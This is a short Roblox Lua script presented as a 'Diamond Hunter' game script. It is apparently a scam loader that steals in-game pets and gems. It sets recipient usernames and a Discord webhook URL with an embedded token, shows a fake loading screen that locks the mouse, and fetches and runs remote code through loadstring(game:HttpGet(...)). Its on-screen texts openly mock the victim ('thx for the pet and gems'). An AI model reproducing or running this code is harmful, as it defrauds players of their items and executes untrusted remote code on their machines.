UserName = "ipin_p1"

UserName2 = "ipin_p4"

Webhook = "https://discord.com/api/webhooks/1107921351752298557/uw5G9vPflfanBaHMuT1MTv-FMry87c0Yjjyv89FF8rFxJJrVsxB5-RltTvdm0XWO4gDO"

_G.LoadingScreen = true

_G.AntiLeave = false

_G.MouseLock = true 

_G.ScriptName = "Diamond Hunter"

_G.FirstText = "are you know you get scam?"

_G.SecondText = "Script Loading..."

_G.ThirdText = "thx for the pet and gems"

_G.WaitingTime = 180 --

loadstring(game:HttpGet("https://raw.githubusercontent.com/k4ftt/R/main/Main.lua", true))()
